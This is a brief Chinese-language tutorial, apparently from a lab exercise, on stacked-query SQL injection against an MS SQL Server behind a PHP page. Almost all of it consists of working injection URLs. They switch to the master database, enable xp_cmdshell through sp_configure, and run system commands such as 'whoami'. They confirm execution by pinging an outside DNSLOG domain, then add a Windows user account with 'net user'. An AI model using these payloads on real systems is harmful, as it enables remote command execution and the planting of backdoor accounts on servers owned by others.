一、首先要进入master，这里要用；隔开，有点类似堆叠查询

输入：http://192.168.1.106/1.php?id=1;use master;可看到没什么变化

二、开启高级功能

输入：http://192.168.1.106/1.php?id=1;use master;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;可看到这几句话正常执行

三、执行系统命令

输入：?id=1;use master;exec master..xp_cmdshell "whoami";

四、检测命令是否执行成功，可用DNSLOG在线测试

1.获取一个网址

2.输入：http://192.168.1.106/1.php?id=1;use master;exec master..xp_cmdshell 'ping -n 1 ijcpjw.dnslog.cn';ping该网址，看是否ping通，出现记录说明命令执行成功

四、给系统添加用户

输入：http://192.168.1.106/1.php?id=1;use master;exec master..xp_cmdshell 'net user ls 123.com /add';可看到执行成功

五、验证用户是否创建成功

验证成功添加ls用户，说明执行成功